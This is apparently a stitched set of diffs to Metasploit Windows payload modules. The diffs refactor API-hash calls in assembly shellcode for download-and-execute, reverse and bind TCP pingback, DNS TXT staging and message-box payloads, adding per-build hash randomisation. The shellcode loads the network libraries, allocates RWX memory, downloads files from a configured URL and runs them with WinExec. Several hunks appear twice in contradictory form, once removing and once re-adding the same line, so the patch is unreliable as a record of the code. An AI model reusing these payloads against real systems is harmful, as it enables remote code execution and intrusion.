         push 3
         pop rdx                       ; CERT_SHA1_HASH_PROP_ID (dwPropId)
-        mov r10, #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
+        mov r10, #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
         call rbp
         test eax, eax                 ; use eax instead of rax, saves a byte
         jz failure                    ; Bail out if we couldn't get the certificate context
@@ -574,7 +575,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push 4
         pop r8                        ; dwNumberOfBytesToRead (4 bytes)
         mov rcx, rsi                  ; hFile (request handle)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
         call rbp
         test eax, eax                 ; did the download fail?
         jz failure
@@ -589,7 +590,7 @@ module Payload::Windows::ReverseWinHttp_x64
         push 0x40
         pop r9                        ; flProtect (0x40=PAGE_EXECUTE_READWRITE)
         mov r8, 0x1000                ; flAllocationType (0x1000=MEM_COMMIT)
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp
 
         ;download stage
@@ -602,7 +603,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r8, rax                   ; dwNumberOfBytesToRead (incoming stage size)
         mov rdx, rbx                  ; lpBuffer (pointer to mem)
         mov r9, rdi                   ; lpdwNumberOfByteRead (stack pointer)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
         call rbp
         add rsp, 32                   ; clean up reserved space
         test eax, eax                 ; did the download fail?
@@ -619,7 +620,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov r9, rdx                   ; flProtect (0x40=PAGE_EXECUTE_READWRITE)
         shl edx, 16                   ; dwSize
         mov r8, 0x1000                ; flAllocationType (0x1000=MEM_COMMIT)
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} ; VirtualAlloc
+        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} ; VirtualAlloc
         call rbp
 
       download_prep:
@@ -633,7 +634,7 @@ module Payload::Windows::ReverseWinHttp_x64
         mov rdx, rbx                  ; lpBuffer (pointer to mem)
         mov r8, 8192                  ; dwNumberOfBytesToRead (8k)
         mov r9, rdi                   ; lpdwNumberOfByteRead (stack pointer)
-        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
+        mov r10, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData
         call rbp
         add rsp, 32                   ; clean up reserved space
 

--- a/lib/msf/core/payload/windows/x64/send_uuid_x64.rb
+++ b/lib/msf/core/payload/windows/x64/send_uuid_x64.rb
@@ -30,7 +30,7 @@ module Payload::Windows::SendUUID_x64
       get_uuid_address:
         pop rdx                ; UUID address
         mov rcx, rdi           ; Socket handle
-        mov r10, #{block_api_hash('ws2_32.dll', 'send')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'send')}
         call rbp               ; call send
     ^
 

--- a/lib/msf/core/payload/windows/x64/send_uuid_x64.rb
+++ b/lib/msf/core/payload/windows/x64/send_uuid_x64.rb
@@ -30,7 +30,7 @@ module Payload::Windows::SendUUID_x64
       get_uuid_address:
         pop rdx                ; UUID address
         mov rcx, rdi           ; Socket handle
-        mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
+        mov r10, #{block_api_hash('ws2_32.dll', 'send')}
         call rbp               ; call send
     ^
 

--- a/lib/msf/util/exe/windows/common.rb
+++ b/lib/msf/util/exe/windows/common.rb
@@ -578,6 +578,7 @@ module Msf::Util::EXE::Windows::Common
     # This wrapper is responsible for allocating RWX memory, copying the
     # target code there, setting an exception handler that calls ExitProcess
     # and finally executing the code.
+    # TODO: We should use the standardized version of block-api here and use randomized IV
     def win32_rwx_exec(code)
       stub_block = Rex::Payloads::Shuffle.from_graphml_file(
         File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x86.graphml'),

--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -67,7 +67,6 @@ module MetasploitModule
   # c.corelan.eu  : contains the last 144 bytes of the alpha shellcode
 
   def generate(_opts = {})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     dnsname = datastore['DNSZONE']
     w_type = 0x0010 # DNS_TYPE_TEXT (TEXT)
     w_type_offset = 0x1c

--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -67,6 +67,7 @@ module MetasploitModule
   # c.corelan.eu  : contains the last 144 bytes of the alpha shellcode
 
   def generate(_opts = {})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     dnsname = datastore['DNSZONE']
     w_type = 0x0010 # DNS_TYPE_TEXT (TEXT)
     w_type_offset = 0x1c
@@ -96,7 +97,7 @@ module MetasploitModule
       push eax                ; flAllocationType MEM_COMMIT (0x1000)
       push eax                ; dwSize (0x1000)
       push 0x0                ; lpAddress
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+      push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
       call ebp
       push eax                ; save pointer on stack, will be used in memcpy
       mov #{bufferreg}, eax   ; save pointer, to jump to at the end
@@ -110,7 +111,7 @@ module MetasploitModule
       push eax                ; push 'dnsapi' to the stack
       push 0x61736e64         ; ...
       push esp                ; Push a pointer to the 'dnsapi' string on the stack.
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
       call ebp                ; LoadLibraryA( "dnsapi" )
 
     ;prepare for loop of queries
@@ -133,7 +134,7 @@ module MetasploitModule
       push #{queryoptions}    ; Options
       push #{w_type}          ; wType
       push eax                ; lpstrName
-      push #{Rex::Text.block_api_hash('dnsapi.dll', 'DnsQuery_A')}
+      push #{block_api_hash('dnsapi.dll', 'DnsQuery_A')}
       call ebp                ;
       test eax, eax           ; query ok?
       jnz jump_to_payload     ; no, jump to payload

--- a/modules/payloads/singles/windows/download_exec.rb
+++ b/modules/payloads/singles/windows/download_exec.rb
@@ -37,7 +37,6 @@ module MetasploitModule
   # Construct the payload
   #
   def generate(_opts = {})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     target_uri = datastore['URL'] || ''
     filename = datastore['EXE'] || ''
     proto = 'https'

--- a/modules/payloads/singles/windows/download_exec.rb
+++ b/modules/payloads/singles/windows/download_exec.rb
@@ -37,6 +37,7 @@ module MetasploitModule
   # Construct the payload
   #
   def generate(_opts = {})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     target_uri = datastore['URL'] || ''
     filename = datastore['EXE'] || ''
     proto = 'https'
@@ -50,8 +51,8 @@ module MetasploitModule
     # ;0x00000200          ; INTERNET_FLAG_NO_UI"
 
     exitfuncs = {
-      'THREAD' => Rex::Text.block_api_hash('kernel32.dll', 'ExitThread').to_i(16), # ExitThread
-      'PROCESS' => Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess').to_i(16), # ExitProcess
+      'THREAD' => block_api_hash('kernel32.dll', 'ExitThread').to_i(16), # ExitThread
+      'PROCESS' => block_api_hash('kernel32.dll', 'ExitProcess').to_i(16), # ExitProcess
       'SEH' => 0x00000000,	# we don't care
       'NONE' => 0x00000000	# we don't care
     }
@@ -137,7 +138,7 @@ module MetasploitModule
       push 0x696e6977        ; ...
       mov esi, esp           ; Save a pointer to wininet
       push esp               ; Push a pointer to the "wininet" string on the stack.
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}         ; hash( "kernel32.dll", "LoadLibraryA" )
+      push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}         ; hash( "kernel32.dll", "LoadLibraryA" )
       call ebp               ; LoadLibraryA( "wininet" )
 
     internetopen:
@@ -147,7 +148,7 @@ module MetasploitModule
       push edi               ; LPCTSTR lpszProxyName
       push edi               ; DWORD dwAccessType (PRECONFIG = 0)
       push esi               ; LPCTSTR lpszAgent ("wininet\x00")
-      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}       ; hash( "wininet.dll", "InternetOpenA" )
+      push #{block_api_hash('wininet.dll', 'InternetOpenA')}       ; hash( "wininet.dll", "InternetOpenA" )
       call ebp
 
       jmp.i8 dbl_get_server_host
@@ -163,7 +164,7 @@ module MetasploitModule
       push #{port_nr}        ; PORT
       push ebx               ; HOSTNAME
       push eax               ; HINTERNET hInternet
-      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}    ; hash( "wininet.dll", "InternetConnectA" )
+      push #{block_api_hash('wininet.dll', 'InternetConnectA')}    ; hash( "wininet.dll", "InternetConnectA" )
       call ebp
 
       jmp.i8 get_server_uri
@@ -179,7 +180,7 @@ module MetasploitModule
       push ecx                ; url
       push edx                ; method
       push eax                ; hConnection
-      push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}    ; hash( "wininet.dll", "HttpOpenRequestA" )
+      push #{block_api_hash('wininet.dll', 'HttpOpenRequestA')}    ; hash( "wininet.dll", "HttpOpenRequestA" )
       call ebp
       mov esi, eax            ; hHttpRequest
 
@@ -195,7 +196,7 @@ module MetasploitModule
       push eax               ; &dwFlags
       push 31                ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
       push esi               ; hRequest
-      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}   ; hash( "wininet.dll", "InternetSetOptionA" )
+      push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}   ; hash( "wininet.dll", "InternetSetOptionA" )
       call ebp
 
     httpsendrequest:
@@ -205,7 +206,7 @@ module MetasploitModule
       push edi               ; dwHeadersLength
       push edi               ; headers
       push esi               ; hHttpRequest
-      push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}    ; hash( "wininet.dll", "HttpSendRequestA" )
+      push #{block_api_hash('wininet.dll', 'HttpSendRequestA')}    ; hash( "wininet.dll", "HttpSendRequestA" )
       call ebp
       test eax,eax
       jnz create_file
@@ -237,7 +238,7 @@ module MetasploitModule
       push 2            ; dwShareMode
       push 2            ; dwDesiredAccess
       push edi          ; lpFileName
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')}    ; kernel32.dll!CreateFileA
+      push #{block_api_hash('kernel32.dll', 'CreateFileA')}    ; kernel32.dll!CreateFileA
       call ebp
 
     download_prep:
@@ -254,7 +255,7 @@ module MetasploitModule
       push eax          ; read length
       push ecx          ; target buffer on stack
       push esi          ; hRequest
-      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}   ; hash( "wininet.dll", "InternetReadFile" )
+      push #{block_api_hash('wininet.dll', 'InternetReadFile')}   ; hash( "wininet.dll", "InternetReadFile" )
       call ebp
 
       test eax,eax        ; download failed? (optional?)
@@ -272,20 +273,20 @@ module MetasploitModule
       lea eax,[esp+0xc]   ; get pointer to buffer
       push eax            ; lpBuffer
       push ebx            ; hFile
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}        ; kernel32.dll!WriteFile
+      push #{block_api_hash('kernel32.dll', 'WriteFile')}        ; kernel32.dll!WriteFile
       call ebp
       sub esp,4           ; set stack back to where it was
       jmp.i8 download_more
 
     close_and_run:
       push ebx
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}       ; kernel32.dll!CloseHandle
+      push #{block_api_hash('kernel32.dll', 'CloseHandle')}       ; kernel32.dll!CloseHandle
       call ebp
 
     execute_file:
       push 0             ; don't show
       push edi           ; lpCmdLine
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')}     ; kernel32.dll!WinExec
+      push #{block_api_hash('kernel32.dll', 'WinExec')}     ; kernel32.dll!WinExec
       call ebp
 
     thats_all_folks:

--- a/modules/payloads/singles/windows/messagebox.rb
+++ b/modules/payloads/singles/windows/messagebox.rb
@@ -40,7 +40,6 @@ module MetasploitModule
   # Construct the payload
   #
   def generate(_opts = {})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO

--- a/modules/payloads/singles/windows/messagebox.rb
+++ b/modules/payloads/singles/windows/messagebox.rb
@@ -40,6 +40,7 @@ module MetasploitModule
   # Construct the payload
   #
   def generate(_opts = {})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO
@@ -55,20 +56,20 @@ module MetasploitModule
 
     exitfunc_asm = %(
         push 0
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        push #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       )
     if datastore['EXITFUNC'].upcase.strip == 'THREAD'
       exitfunc_asm = %(
-        mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}
+        mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')}
+        push #{block_api_hash('kernel32.dll', 'GetVersion')}
         call ebp
         add esp,0x28
         cmp al,0x6
         jl use_exitthread   ; is older than Vista or Server 2003 R2?
         cmp bl,0xe0         ; check if GetVersion change the hash stored in EBX
         jne use_exitthread
-        mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}
+        mov ebx, #{block_api_hash('ntdll.dll', 'RtlExitUserThread')}
       use_exitthread:
         push 0
         push ebx
@@ -85,7 +86,7 @@ module MetasploitModule
       call get_user32
       db "user32.dll", 0x00
     get_user32:
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
       call ebp
       push #{style}
       call get_title
@@ -95,7 +96,7 @@ module MetasploitModule
       db "#{datastore['TEXT']}", 0x00
     get_text:
       push 0
-      push #{Rex::Text.block_api_hash('user32.dll', 'MessageBoxA')}
+      push #{block_api_hash('user32.dll', 'MessageBoxA')}
       call ebp
       #{exitfunc_asm}
     )

--- a/modules/payloads/singles/windows/pingback_bind_tcp.rb
+++ b/modules/payloads/singles/windows/pingback_bind_tcp.rb
@@ -40,7 +40,6 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first
     encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack('V').first
     [encoded_host, encoded_port]

--- a/modules/payloads/singles/windows/pingback_bind_tcp.rb
+++ b/modules/payloads/singles/windows/pingback_bind_tcp.rb
@@ -40,6 +40,7 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first
     encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack('V').first
     [encoded_host, encoded_port]
@@ -63,14 +64,14 @@ module MetasploitModule
         push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
         push 0x5F327377        ; ...
         push esp               ; Push a pointer to the "ws2_32" string on the stack.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call ebp               ; LoadLibraryA( "ws2_32" )
 
         mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
         sub esp, eax           ; alloc some space for the WSAData structure
         push esp               ; push a pointer to this struct
         push eax               ; push the wVersionRequested parameter
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
         call ebp               ; WSAStartup( 0x0190, &WSAData );
 
         push 11
@@ -86,7 +87,7 @@ module MetasploitModule
                                ; we do not specify a protocol [5]
         push 1                 ; push SOCK_STREAM
         push #{addr_fam}       ; push AF_INET/6
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
         call ebp               ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
         xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
 
@@ -97,24 +98,24 @@ module MetasploitModule
         push #{sockaddr_size}  ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
         push esi               ; pointer to the sockaddr_in struct
         push edi               ; socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
+        push #{block_api_hash('ws2_32.dll', 'bind')}
         call ebp               ; bind( s, &sockaddr_in, 16 );
         test eax,eax            ; non-zero means a failure
         jnz failure
                                ; backlog, pushed earlier [3]
         push edi               ; socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
+        push #{block_api_hash('ws2_32.dll', 'listen')}
         call ebp               ; listen( s, 0 );
 
                                ; we set length for the sockaddr struct to zero, pushed earlier [2]
                                ; we dont set the optional sockaddr param, pushed earlier [1]
         push edi               ; listening socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
+        push #{block_api_hash('ws2_32.dll', 'accept')}
         call ebp               ; accept( s, 0, 0 );
 
         push edi               ; push the listening socket
         xchg edi, eax          ; replace the listening socket with the new connected socket for further comms
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        push #{block_api_hash('ws2_32.dll', 'closesocket')}
         call ebp               ; closesocket( s );
 
         send_pingback:
@@ -124,12 +125,12 @@ module MetasploitModule
           db #{uuid_as_db}  ; PINGBACK_UUID
         get_pingback_address:
           push edi               ; saved socket
-          push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
+          push #{block_api_hash('ws2_32.dll', 'send')}
           call ebp               ; call send
 
         push edi               ; push the listening socket
         xchg edi, eax          ; replace the listening socket with the new connected socket for further comms
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        push #{block_api_hash('ws2_32.dll', 'closesocket')}
         call ebp               ; closesocket( s );
 
         handle_connect_failure:
@@ -140,7 +141,7 @@ module MetasploitModule
         cleanup_socket:
           ; clear up the socket
           push edi                ; socket handle
-          push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+          push #{block_api_hash('ws2_32.dll', 'closesocket')}
           call ebp                ; closesocket(socket)
 
         failure:

--- a/modules/payloads/singles/windows/pingback_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/pingback_reverse_tcp.rb
@@ -40,6 +40,7 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')
     encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack1('V')
     retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max
@@ -62,7 +63,7 @@ module MetasploitModule
           push '32'               ; Push the bytes 'ws2_32',0,0 onto the stack.
           push 'ws2_'             ; ...
           push esp                ; Push a pointer to the "ws2_32" string on the stack.
-          push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+          push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
           mov eax, ebp
           call eax                ; LoadLibraryA( "ws2_32" )
 
@@ -70,7 +71,7 @@ module MetasploitModule
           sub esp, eax            ; alloc some space for the WSAData structure
           push esp                ; push a pointer to this struct
           push eax                ; push the wVersionRequested parameter
-          push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+          push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
           call ebp                ; WSAStartup( 0x0190, &WSAData );
 
         set_address:
@@ -89,7 +90,7 @@ module MetasploitModule
           push eax                ; push SOCK_STREAM
           inc eax                 ;
           push eax                ; push AF_INET
-          push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+          push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
           call ebp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
           xchg edi, eax           ; save the socket for later, don't care about the value of eax after this
 
@@ -97,7 +98,7 @@ module MetasploitModule
           push 16                 ; length of the sockaddr struct
           push esi                ; pointer to the sockaddr struct
           push edi                ; the socket
-          push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
+          push #{block_api_hash('ws2_32.dll', 'connect')}
           call ebp                ; connect( s, &sockaddr, 16 );
 
           test eax,eax            ; non-zero means a failure
@@ -119,13 +120,13 @@ module MetasploitModule
           db #{uuid_as_db}  ; PINGBACK_UUID
         get_pingback_address:
           push edi               ; saved socket
-          push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
+          push #{block_api_hash('ws2_32.dll', 'send')}
           call ebp               ; call send
 
         cleanup_socket:
           ; clear up the socket
           push edi                ; socket handle
-          push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+          push #{block_api_hash('ws2_32.dll', 'closesocket')}
           call ebp                ; closesocket(socket)
         ^
     if pingback_count > 0
@@ -136,7 +137,7 @@ module MetasploitModule
           dec [esi+12]
           sleep:
             push #{pingback_sleep * 1000}
-            push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
+            push #{block_api_hash('kernel32.dll', 'Sleep')}
             call ebp                  ;sleep(pingback_sleep * 1000)
             jmp create_socket
         ^

--- a/modules/payloads/singles/windows/pingback_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/pingback_reverse_tcp.rb
@@ -40,7 +40,6 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')
     encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack1('V')
     retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max

--- a/modules/payloads/singles/windows/x64/download_exec.rb
+++ b/modules/payloads/singles/windows/x64/download_exec.rb
@@ -37,7 +37,6 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     url = datastore['URL'] || 'http://localhost/hi.exe'
     file = datastore['FILEPATH'] || 'fox.exe'
     display = datastore['DISPLAY'] || 'HIDE'

--- a/modules/payloads/singles/windows/x64/download_exec.rb
+++ b/modules/payloads/singles/windows/x64/download_exec.rb
@@ -37,6 +37,7 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     url = datastore['URL'] || 'http://localhost/hi.exe'
     file = datastore['FILEPATH'] || 'fox.exe'
     display = datastore['DISPLAY'] || 'HIDE'
@@ -55,7 +56,7 @@ module MetasploitModule
         LoadLibrary:
             pop rcx ; rcx points to the dll name.
             xor byte [rcx+10], 'K' ; null terminator
-            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+            mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
             call rbp ; LoadLibraryA("urlmon.dll")
             ; To live alone one must be an animal or a god, says Aristotle. There is yet a third case: one must be both--a philosopher.
 
@@ -76,7 +77,7 @@ module MetasploitModule
             xor r9,r9   ; 4th argument
             sub rsp, 8
             push rcx    ; 5th argument
-            mov r10d, #{Rex::Text.block_api_hash('urlmon.dll', 'URLDownloadToFileA')}
+            mov r10d, #{block_api_hash('urlmon.dll', 'URLDownloadToFileA')}
             call rbp
 
         SetCommand:
@@ -86,7 +87,7 @@ module MetasploitModule
         Exec:
             pop rcx ; 1st argument
             xor byte [rcx+#{file.length + 7}], 'F' ; null terminator
-            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')}
+            mov r10d, #{block_api_hash('kernel32.dll', 'WinExec')}
             xor rdx, rdx ; 2nd argument
         ^
 
@@ -107,7 +108,7 @@ module MetasploitModule
     if datastore['EXITFUNC'] == 'process'
       exit_asm = %(
             xor rcx,rcx
-            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+            mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
             call rbp
             )
       payload << exit_asm
@@ -115,7 +116,7 @@ module MetasploitModule
     elsif datastore['EXITFUNC'] == 'thread'
       exit_asm = %(
             xor rcx,rcx
-            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
+            mov r10d, #{block_api_hash('kernel32.dll', 'ExitThread')}
             call rbp
             )
       payload << exit_asm

--- a/modules/payloads/singles/windows/x64/messagebox.rb
+++ b/modules/payloads/singles/windows/x64/messagebox.rb
@@ -36,6 +36,7 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO
@@ -51,20 +52,20 @@ module MetasploitModule
 
     exitfunc_asm = %(
         xor rcx,rcx
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp
       )
     if datastore['EXITFUNC'].upcase.strip == 'THREAD'
       exitfunc_asm = %(
-        mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}
+        mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'GetVersion')}
         call rbp
         add rsp,0x28
         cmp al,0x6
         jl use_exitthread   ; is older than Vista or Server 2003 R2?
         cmp bl,0xe0         ; check if GetVersion change the hash stored in EBX
         jne use_exitthread
-        mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}
+        mov ebx, #{block_api_hash('ntdll.dll', 'RtlExitUserThread')}
 
         use_exitthread:
         push 0
@@ -84,7 +85,7 @@ module MetasploitModule
       db "user32.dll", 0x00
     get_user32:
       pop rcx
-      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
       call rbp
       mov r9, #{style}
       call get_text
@@ -96,7 +97,7 @@ module MetasploitModule
     get_title:
       pop r8
       xor rcx,rcx
-      mov r10d, #{Rex::Text.block_api_hash('user32.dll', 'MessageBoxA')}
+      mov r10d, #{block_api_hash('user32.dll', 'MessageBoxA')}
       call rbp
     exitfunk:
       #{exitfunc_asm}

--- a/modules/payloads/singles/windows/x64/messagebox.rb
+++ b/modules/payloads/singles/windows/x64/messagebox.rb
@@ -36,7 +36,6 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO

--- a/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 425
+  CachedSize = 422
 
   include Msf::Payload::Windows
   include Msf::Payload::Single

--- a/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb
@@ -234,12 +234,12 @@ module MetasploitModule
         get_pingback_address:
           pop rdx                ; PINGBACK UUID address
           mov rcx, rdi           ; Socket handle
-          mov r10, #{block_api_hash('ws2_32.dll', 'send')}
+          mov r10d, #{block_api_hash('ws2_32.dll', 'send')}
           call rbp               ; call send
 
         close_socket:
           mov rcx, rdi           ; Socket handle
-          mov r10, #{block_api_hash('ws2_32.dll', 'closesocket')}
+          mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')}
           call rbp               ; call closesocket
         ^
     if pingback_count > 0
@@ -250,7 +250,7 @@ module MetasploitModule
             dec r15               ;decrement the pingback retry counter
             push #{pingback_sleep * 1000}            ; 10 seconds
             pop rcx               ; set the sleep function parameter
-            mov r10, #{block_api_hash('kernel32.dll', 'Sleep')}
+            mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')}
             call rbp              ; Sleep()
             jmp create_socket     ; repeat callback
         ^

--- a/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb
@@ -40,6 +40,7 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     # 22 -> "0x00,0x16"
     # 4444 -> "0x11,0x5c"
     encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first
@@ -168,14 +169,14 @@ module MetasploitModule
 
         ; perform the call to LoadLibraryA...
           mov rcx, r14            ; set the param for the library to load
-          mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+          mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
           call rbp                ; LoadLibraryA( "ws2_32" )
 
         ; perform the call to WSAStartup...
           mov rdx, r13            ; second param is a pointer to this struct
           push 0x0101             ;
           pop rcx                 ; set the param for the version requested
